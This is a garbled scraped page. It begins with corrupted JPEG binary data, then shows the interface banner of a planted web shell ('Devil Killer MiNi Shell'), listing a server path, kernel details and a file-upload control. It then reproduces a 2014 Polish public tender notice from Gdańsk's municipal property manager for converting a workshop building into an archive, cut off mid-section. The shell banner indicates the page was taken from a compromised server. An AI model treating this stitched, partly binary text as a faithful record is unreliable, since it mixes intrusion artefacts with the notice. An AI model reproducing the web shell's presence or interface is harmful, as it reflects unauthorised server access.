JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140509/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140509/157014-N-2014.html

<p class="kh_header"><b>Gdańsk: Wykonanie adaptacji pomieszczeń warsztatowo-archiwalnych na archiwum oraz dostosowanie elewacji i piwnic budynku B Zarządu GZNK-SZB do wymogów p.poż. przy ul. Partyzantów 74 w Gdańsku</b><br>
<b>Numer ogłoszenia: 157014 - 2014; data zamieszczenia: 09.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdański Zarząd Nieruchomości Komunalnych - Samorządowy Zakład Budżetowy , ul. Partyzantów 74, 80-254 Gdańsk, woj. pomorskie, tel. 58 3201032, 3200220, 3023282, faks 58 3458235.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gznk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie adaptacji pomieszczeń warsztatowo-archiwalnych na archiwum oraz dostosowanie elewacji i piwnic budynku B Zarządu GZNK-SZB do wymogów p.poż. przy ul. Partyzantów 74 w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest wykonanie przebudowy budynku warsztatowo-archiwalnego na archiwum oraz dostosowanie elewacji i piwnic budynku B Zarządu GZNK-SZB przy ul. Partyzantów 74 w Gdańsku do wymogów p.poż.  
<br>Budynek warsztatowo-archiwalny jest budynkiem jednokondygnacyjnym przylegającym ścianą szczytową do budynku biurowego czterokondygnacyjnego. W budynku zlokalizowane są warsztaty samochodowe, magazyny GZNK oraz węzeł cieplny. Część powierzchni wykorzystana jest na archiwum. Budynek częściowo jest podpiwniczony, przykryty stropodachem nie wentylowanym z płyt panwiowych z świetlikami dachowymi, o konstrukcji stalowej. 
<br> Konstrukcja budynku: 
<br>- budynek typu halowego,
<br>- konstrukcja nośna żelbetowa,
<br>- dźwigary strunobetonowe o rozpiętości 18 m oparte na żelbetowych słupach,
<br>- na dźwigarach oparte są płyty dachowe żebrowe, żelbetowe, prefabrykowane o rozpiętości 6 m, 
<br>- dach wielospadowy kryty papą,
<br>- posadzki usytuowane 5-10 cm powyżej terenu,
<br>- ściany osłonowe zewnętrzne oraz wewnętrzne wykonane z cegły kratówki i otynkowane.
<br>W budynku w części biurowej przewiduje się stanowiska pracy dla 8 pracowników biurowych.
<br>Przy pomieszczeniach biurowych zaprojektowano zaplecze socjalne wraz z pomieszczeniami WC oraz pomieszczenia dla służb porządkowych - sprzątaczek z szatnią i węzłem sanitarnym.  
<br>Budynek B Zarządu GZNK-SZB jest budynkiem biurowym czterokondygnacyjnym, częściowo podpiwniczonym, przekrytym stropodachem nie wentylowanym, z pokryciem dachowym z papy.
<br>Budynek warsztatowo-archiwalny.
<br>Powierzchnia zabudowy budynku -   2 016,22 m2
<br>Powierzchnia użytkowa budynku  -   1 872,54 m2
<br>Kubatura budynku                         -  14 280,00 m3
<br>2. Zakres robót obejmuje:
<br>2.1. Przebudowę budynku warsztatowo-archiwalnego tj.
<br>a) roboty ogólnobudowlane tj.
<br>- roboty rozbiórkowe, 
<br>- wymurowanie ścian i ścianek działowych z cegły pełnej,
<br>- wykonanie elementów konstrukcyjnych,
<br>- wykonanie nadproży,
<br>- uzupełnienie i zamurowanie otworów w ścianach zewnętrznych,
<br>- wykonanie wieńców na ścianach działowych,
<br>- wykonanie konstrukcji nośnej dla sufitu podwieszonego,
<br>- montaż sufitu podwieszonego,
<br>- montaż ścianek działowych,
<br>- uzupełnienie tynków zewnętrznych,
<br>- wykonanie izolacji poziomej ścian i słupów,
<br>- wykonanie izolacji pionowej ścian,
<br>- docieplenie ścian fundamentowych oraz zewnętrznych,
<br>- docieplenie stropodachu,
<br>- wykonanie pokrycia dachowego papą termozgrzewalną,
<br>- wykonanie obróbek blacharskich, rynien rur spustowych,
<br>- wykonanie docieplenia wraz z wykonaniem tynków zewnętrznych mineralnych,
<br>- wykonanie warstw posadzek wraz z warstwami gruntującymi i izolacyjnymi,
<br>- montaż okien, naświetli, ościeżnic drzwiowych wraz ze skrzydłami oraz ociepleniem bram garażowych,
<br>- montaż parapetów zewnętrznych i wewnętrznych,
<br>- montaż nawiewników okiennych,
<br>- wykonanie, tynków cementowo- wapiennych na ścianach i sufitach,
<br>- wykonanie izolacji przeciwwilgociowej na ścianach oraz posadzce w pomieszczeniach W-C i sanitarnych, 
<br>- ułożenie glazury na ścianach w pomieszczeniach W-C i sanitarnych,
<br>- wykonanie wszystkich warstw posadzkowych wraz z dylatacją,
<br>- ułożenie płytek ceramicznych antypoślizgowych  na podłogach i schodach,
<br>- wykonanie gładzi gipsowych oraz malowanie sufitów i ścian,
<br>- wykonanie obudowy kanałów wentylacyjnych,  
<br>- ułożenie wykładzin winylowych akustycznych wraz z cokolikami,
<br>- montaż balustrad, pochwytów klatki schodowej,
<br>- montaż elementów ślusarskich,
<br>- wykonanie nawierzchni zewnętrznych z kostki betonowej,
<br>- wykonanie opaski żwirowej wokół budynku,
<br>- wykonanie ogrodzenia systemowego wraz z furtką wokół urządzeń chłodniczych klimatyzacji,  
<br>- wykonanie fundamentów pod urządzenia chłodnicze klimatyzacji,
<br>- wykonanie prac porządkowych,
<br>b) wykonanie instalacji wentylacji dla pomieszczeń biurowo - higieniczno - sanitarnych  oraz  klimatyzacji dla pomieszczeń archiwów,
<br>c) roboty sanitarne tj.
<br>­- wykonanie instalacji wodociągowej i kanalizacyjnej wraz z montażem urządzeń,
<br>­- wykonanie instalacji centralnego ogrzewania,
­<br>- wykonanie instalacji ciepłej wody użytkowej,
­<br>- wykonanie wewnętrznej instalacji kanalizacji deszczowej,
<br>­- wykonanie instalacji hydrantowej,
<br>d) roboty elektryczne tj.
<br>­- wykonanie instalacji elektrycznej obejmującej układy zasilania wentylacji i klimatyzacji, instalację oświetlenia ogólnego oraz awaryjnego,
<br>- wykonanie instalacji automatycznej sygnalizacji pożaru SAP, 
<br>- wykonanie instalacji alarmu i kontroli dostępu,
<br>- wykonanie instalacji strukturalnej. 
<br>2.2. Dostosowanie elewacji i piwnic budynku B Zarządu GZNK-SZB do wymogów p.poż. tj.
<br>a) roboty ogólnobudowlane tj.
<br>- roboty rozbiórkowe, 
<br>- zamurowanie otworów po oknach i naświetlach elewacji wschodniej,
<br>- uzupełnienie tynków zewnętrznych pod docieplenie budynku,
<br>- uzupełnienie tynków wewnętrznych,
<br>- wykonanie gładzi gipsowych na nowych tynkach wewnętrznych,
<br>- wykonanie docieplenia całej elewacji wschodniej wraz z wykonaniem tynków zewnętrznych i malowaniem farbą silikatową, 
<br>- wykonanie robót malarskich wewnętrznych  na sufitach i ścianach  w obrębie korytarzy,
<br>- wykonanie prac porządkowych,
<br>2.3. Wykonanie świadectwa charakterystyki energetycznej budynku.
<br>Uwaga 
<br>Minimalne parametry techniczne stolarki okiennej z aluminium lub PCV oraz drzwi określone są w punkcie 2.2. Specyfikacji technicznej wykonania i odbioru robót. Roboty budowlane. Okna drzwi i bramy - załącznik nr 5 rozdział XVI.
<br>3.  Szczegółowy opis przedmiotu zamówienia stanowią:
<br>3.1. Projekt budowlany. Przebudowa budynku archiwum Gdańsk ul. Partyzantów 74 -  załącznik nr 1 do siwz.  
<br>a) architektura - załącznik nr 1.1 do siwz:
<br>- rysunek 3 - projekt budowlany - inwentaryzacja - rzut przyziemia - załącznik nr 1.1a do siwz,
<br>- rysunek 4 - projekt budowlany - inwentaryzacja - rzut dachu - załącznik nr 1.1b do siwz,
<br>- rysunek 5 - projekt budowlany - inwentaryzacja - przekrój A-A - załącznik nr 1.1c do siwz,
<br>- rysunek 6 - projekt budowlany - inwentaryzacja - przekrój B-B - załącznik nr 1.1d do siwz,
<br>- rysunek 7 - projekt budowlany - inwentaryzacja - elewacja frontowa - płn. - załącznik nr 1.1e do siwz,
<br>- rysunek 8 - projekt budowlany - inwentaryzacja - elewacja szczytowa - wsch. - załącznik nr 1.1f do siwz,
<br>- rysunek 9 - projekt budowlany - inwentaryzacja - elewacja tylna - płd. - załącznik nr 1.1g do siwz,
<br>- rysunek 10 - projekt budowlany - architektura - rzut piwnic i fundamentów - załącznik nr 1.1h do siwz,
<br>- rysunek 11 - projekt budowlany - architektura - rzut przyziemia - załącznik nr 1.1i do siwz,
<br>- rysunek 12 - projekt budowlany - architektura - rzut przyziemia - poziom ?0,00 - załącznik nr 1.1j do siwz,
<br>- rysunek 13 - projekt budowlany - architektura - rzut przyziemia - poziom ?3,10 - załącznik nr 1.1k do siwz,
<br>- rysunek 14 - projekt budowlany - architektura - rzut dachu - załącznik nr 1.1l do siwz,
<br>- rysunek 15 - projekt budowlany - architektura - przekrój A-A - załącznik nr 1.1ł do siwz,
<br>- rysunek 16 - projekt budowlany - architektura - przekrój B-B - załącznik nr 1.1m do siwz,
<br>- rysunek 17 - projekt budowlany - architektura - przekrój B&#8242-B&#8242 - załącznik nr 1.1n do siwz,
<br>- rysunek 18 - projekt budowlany - architektura - elewacja frontowa - płn. - załącznik nr 1.1o do siwz,
<br>- rysunek 19 - projekt budowlany - architektura - elewacja szczytowa - wsch. - załącznik nr 1.1p do siwz,
<br>- rysunek 20 - projekt budowlany - architektura - elewacja tylna - płd. - załącznik nr 1.1r do siwz,
<br>- rysunek 21 - projekt budowlany - architektura - elewacja frontowa - płn.- kolorystyka elewacji - załącznik nr 1.1s do siwz,
<br>- rysunek 23 - projekt budowlany - architektura - zestawienie drzwi i bram - załącznik nr 1.1t do siwz,
<br>- rysunek 24 - projekt budowlany - architektura - rzut pomieszczeń biurowych - załącznik nr 1.1u do siwz,
<br>- rysunek 25 - projekt budowlany - architektura - rzut sufitu podwieszanego - załącznik nr 1.1w do siwz,
<br>b) konstrukcje - załącznik nr 1.2 do siwz.
<br>c) wentylacja i klimatyzacja - załącznik nr 1.3 do siwz:
<br>- rysunek k/1 - projekt budowlany - sanitarny - klimatyzacja Rzut parteru - załącznik nr 1.3a do siwz,
<br>- rysunek k/2 - projekt budowlany - sanitarny - klimatyzacja Rzut dachu - załącznik nr 1.3b do siwz,
<br>- rysunek k/3 - projekt budowlany - sanitarny - rzut parteru woda technologiczna - załącznik nr 1.3c do siwz,
<br>d) instalacje sanitarne - załącznik nr 1.4 do siwz:
<br>- rysunek 1/S - projekt budowlany - sanitarny - rzut przyziemia - załącznik nr 1.4a do siwz,
<br>- rysunek 2/S - projekt budowlany - sanitarny - rzut przyziemia (fragment) - załącznik nr 1.4b do siwz,
<br>e) instalacje elektryczne - załącznik nr 1.5 do siwz.
<br>3.2. Projekt budowlano - wykonawczy. Przebudowa budynku archiwum Gdańsk ul. Partyzantów 74 -  załącznik nr 2 do siwz.  
<br>a) architektura - załącznik nr 2.1 do siwz:
<br>- rysunek 3 - projekt budowlano-wykonawczy - inwentaryzacja - rzut przyziemia - załącznik nr 2.1a do siwz,
<br>- rysunek 4 - projekt budowlano-wykonawczy - inwentaryzacja - rzut dachu - załącznik nr 2.1b do siwz,
<br>- rysunek 5 - projekt budowlano-wykonawczy - inwentaryzacja - przekrój A-A - załącznik nr 2.1c do siwz,
<br>- rysunek 6 - projekt budowlano-wykonawczy - inwentaryzacja - przekrój B-B - załącznik nr 2.1d do siwz,
<br>- rysunek 7 - projekt budowlano-wykonawczy - inwentaryzacja - elewacja frontowa - płn. - załącznik nr 2.1e do siwz,
<br>- rysunek 8 - projekt budowlano-wykonawczy - inwentaryzacja - elewacja szczytowa - wsch. - załącznik nr 2.1f do siwz,
<br>- rysunek 9 - projekt budowlano-wykonawczy - inwentaryzacja - elewacja tylna - płd. - załącznik nr 2.1g do siwz,
<br>- rysunek 10 - projekt budowlano-wykonawczy - architektura - rzut piwnic i fundamentów - załącznik nr 2.1h do siwz,
<br>- rysunek 11 - projekt budowlano-wykonawczy - architektura - rzut przyziemia - załącznik nr 2.1i do siwz,
<br>- rysunek 12 - projekt budowlano-wykonawczy - architektura - rzut przyziemia - poziom ?0,00 - załącznik nr 2.1j do siwz,
<br>- rysunek 13 - projekt budowlano-wykonawczy - architektura - rzut przyziemia - poziom ?3,10 - załącznik nr 2.1k do siwz,
<br>- rysunek 14 - projekt budowlano-wykonawczy - architektura - rzut dachu - załącznik nr 2.1l do siwz,
<br>- rysunek 15 - projekt budowlano-wykonawczy - architektura - przekrój A-A - załącznik nr 2.1ł do siwz,
<br>- rysunek 16 - projekt budowlano-wykonawczy - architektura - przekrój B-B - załącznik nr 2.1m do siwz,
<br>- rysunek 17 - projekt budowlano-wykonawczy - architektura - przekrój B&#8242-B&#8242 - załącznik nr 2.1n do siwz,
<br>- rysunek 18 - projekt budowlano-wykonawczy - architektura - elewacja frontowa - płn. - załącznik nr 2.1o do siwz,
<br>- rysunek 19 - projekt budowlano-wykonawczy - architektura - elewacja szczytowa - wsch. - załącznik nr 2.1p do siwz,
<br>- rysunek 20 - projekt budowlano-wykonawczy - architektura - elewacja tylna - płd. - załącznik nr 2.1r do siwz,
<br>- rysunek 21 - projekt budowlano-wykonawczy - architektura - elewacja frontowa - płn.- kolorystyka elewacji - załącznik nr 2.1s do siwz,
<br>- rysunek 23 - projekt budowlano-wykonawczy - architektura - zestawienie drzwi i bram - załącznik nr 2.1t do siwz,
<br>- rysunek 24 - projekt budowlano-wykonawczy - architektura - rzut pomieszczeń biurowych - załącznik nr 2.1u do siwz,
<br>- rysunek 25 - projekt budowlano-wykonawczy - architektura - rzut sufitu podwieszanego - załącznik nr 2.1w do siwz,
<br>-rysunek 28 - projekt budowlano-wykonawczy - architektura - zadaszenie w elewacji frontowej nad wejściami - załącznik nr 2.1y do siwz,
<br>- rysunek 30 - projekt budowlano-wykonawczy - architektura - ogrodzenie systemowe - załącznik nr 2.1z do siwz,
<br>b) konstrukcje - załącznik nr 2.2 do siwz.
<br>c) wentylacja i klimatyzacja - załącznik nr 2.3 do siwz:
<br>- rysunek k/1 - projekt budowlano-wykonawczy - sanitarny - klimatyzacja Rzut parteru - załącznik nr 2.3a do siwz,
<br>- rysunek k/2 - projekt budowlano-wykonawczy - sanitarny - klimatyzacja Rzut dachu - załącznik nr 2.3b do siwz,
<br>- rysunek k/3 - projekt budowlano-wykonawczy - sanitarny - klimatyzacja Przekrój W1-W1 - załącznik nr 2.3c do siwz,
<br>- rysunek k/4 - projekt budowlano-wykonawczy - sanitarny - rzut parteru woda technologiczna - załącznik nr 2.3d do siwz,
<br>- rysunek k/5 - projekt budowlano-wykonawczy - sanitarny - klimatyzacja Schematy hydrauliczne - załącznik nr 2.3e do siwz,
<br>- rysunek k/6 - projekt budowlano-wykonawczy - sanitarny - klimatyzacja rozmieszczenie żaluzji   napowietrzających - załącznik nr 2.3f do siwz,
<br>d) instalacje sanitarne - załącznik nr 2.4 do siwz:
<br>- rysunek 1/S - projekt budowlano-wykonawczy - sanitarny - rzut przyziemia - załącznik nr 2.4a do siwz,
<br>- rysunek 2/S - projekt budowlano-wykonawczy - sanitarny - aksonometryczne rozwinięcie instalacji hydrantowej - załącznik nr 2.4b do siwz,
<br>- rysunek 3/S - projekt budowlano-wykonawczy - sanitarny - rozwinięcie kanalizacji deszczowej - załącznik nr 2.4c do siwz,
<br>- rysunek 4/S - projekt budowlano-wykonawczy - sanitarny - rzut przyziemia (fragment) - załącznik nr 2.4d do siwz,
<br>- rysunek 5/S - projekt budowlano-wykonawczy - sanitarny - rozwinięcie instalacji kanalizacji sanitarnej - załącznik nr 2.4e do siwz,
<br>- rysunek 8/S - projekt budowlano-wykonawczy - sanitarny - schemat instalacji c.o. - załącznik nr 2.4f do siwz,
<br>e) instalacje elektryczne - załącznik nr 2.5 do siwz.
<br>3.3. Projekt budowlany. Dostosowanie elewacji i piwnic budynku B Zarządu GZNK-SZB do wymogów p.poż. Gdańsk ul. Partyzantów 74 -  załącznik nr 3 do siwz.  
<br>- rysunek 3 - projekt budowlany - inwentaryzacja - rzut piętra - kondygnacja powtarzalna - załącznik nr 3.1a do siwz,
<br>- rysunek 5 - projekt budowlany - inwentaryzacja - elewacja i przekrój B-B - załącznik nr 3.1b do siwz,
<br>- rysunek 7 - projekt budowlany - architektura - rzut piętra - kondygnacja powtarzalna - załącznik nr 3.1c do siwz,
<br>- rysunek 9 - projekt budowlany - architektura - elewacja i przekrój B-B - załącznik nr 3.1d do siwz,
<br>3.4. Projekt budowlano - wykonawczy. Dostosowanie elewacji i piwnic budynku B Zarządu GZNK-SZB do wymogów p.poż. Gdańsk ul. Partyzantów 74 -  załącznik nr 4 do siwz.  
<br>- rysunek 3 - projekt budowlano-wykonawczy - inwentaryzacja - rzut piętra - kondygnacja powtarzalna - załącznik nr 4.1a do siwz,
<br>- rysunek 5 - projekt budowlano-wykonawczy - inwentaryzacja - elewacja i przekrój B-B - załącznik nr 4.1b do siwz,
<br>- rysunek 7 - projekt budowlano-wykonawczy - architektura - rzut piętra - kondygnacja powtarzalna - załącznik nr 4.1c do siwz,
<br>- rysunek 9 - projekt budowlano-wykonawczy - architektura - elewacja i przekrój B-B - załącznik nr 4.1d do siwz.
<br>3.5. Specyfikacja techniczna wykonania i odbioru robot. Przebudowa budynku warsztatowego na archiwum Gdańsk ul. Partyzantów 74. Roboty budowlane - załącznik nr 5 do siwz.  
<br>3.6. Specyfikacja techniczna wykonania i odbioru robot. Przebudowa budynku warsztatowego zlokalizowanego w Gdańsku ul. Partyzantów 74. Roboty instalacyjne. Instalacje sanitarne - załącznik nr 6 do siwz.  
<br>3.7. Specyfikacja techniczna wykonania i odbioru robot. Przebudowa budynku warsztatowo-magazynowego zlokalizowanego w Gdańsku ul. Partyzantów 74 na archiwum GZNK SZB i UM Gdańsk. Roboty instalacyjne. Instalacja klimatyzacji - załącznik nr 7 do siwz.    
<br>3.8. Specyfikacja techniczna wykonania i odbioru robot.  Przebudowa budynku warsztatowego na budynek archiwum w Gdańsku przy ul. Partyzantów 74. Roboty instalacji elektrycznych - załącznik nr 8 do siwz.  
<br>3.9. Specyfikacja techniczna wykonania i odbioru robot. Dostosowanie elewacji i piwnic budynku Zarządu B GZNK-SZB przy ul Partyzantów 74 do wymogów p.poż. Roboty budowlane - załącznik nr 9 do siwz..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.10.00-8, 45.26.20.00-1, 45.26.23.00-4, 45.26.23.10-7, 45.26.23.11-4, 45.26.23.50-9, 45.26.25.00-6, 45.30.00.00-0, 45.31.00.00-3, 45.33.00.00-9, 45.33.10.00-6, 45.33.11.00-7, 45.40.00.00-1, 45.41.00.00-4, 45.43.00.00-0, 45.44.21.00-8, 45.45.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kwota wadium: 101 500,00 zł, w tym:
<br>zadanie 1 - 100 000,00  zł,
<br>zadanie 2 -     1 500,00  zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia Wykonawca musiał wykonać w okresie ostatnich pięciu lat przed upływem terminu składania ofert
<br>w przypadku składania oferty:
<br>na zadanie 1 lub zadanie 1 i zadanie 2:
<br>- minimum 2 roboty budowlane polegające na wykonaniu robót adaptacyjnych (remontowych) lub wykonaniu pod klucz nowych budynków użyteczności publicznej albo biurowych o wartości nie mniejszej niż 3 000 000,00 zł  brutto każda, obejmujące roboty ogólnobudowlane, elektryczne i sanitarne, w tym wykonanie montażu instalacji klimatyzacyjnej.
<br>na zadanie 2:    
<br>- minimum 2 roboty budowlane polegające na wykonaniu robót dociepleniowych ścian budynku o wartości minimum 50 000,00 zł brutto każda. 

<br>Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunki mogą spełniać łącznie.

<br>Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków udowadniając, iż będzie dysponował  zasobami niezbędnymi do realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca musi wykazać dysponowanie: 
<br>w przypadku składania oferty:
<br>na zadanie 1 lub zadanie 1 i zadanie 2:
<br>10 osobami, w tym: 
<br>- 1 osobą, posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń,
<br>- 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,
<br>- 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń,
<br>- 1 osobą posiadającą uprawnienia do wykonywania pracy na stanowisku eksploatacji w zakresie montażu, remontu, kontrolno-pomiarowym urządzeń i instalacji należących do Grupy 1.   Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające,  przetwarzające, przesyłające i zużywające energię elektryczną dla urządzeń i instalacji o napięciu nie wyższym niż 1 kV, zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy  i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania  kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci. (Dz.U. nr  89 poz. 828 z późn. zm.).
<br>Wyżej wymienione uprawnienia powinny upoważniać do wykonywania pomiarów ochronnych instalacji do 1 kV,
<br>- 6 osobami do wykonywania robót.
<br>na zadanie 2:
<br>3 osobami, w tym: 
<br>- 1 osobą, posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,
<br>- 2 osobami do wykonywania robót.

<br>Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.

<br>Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
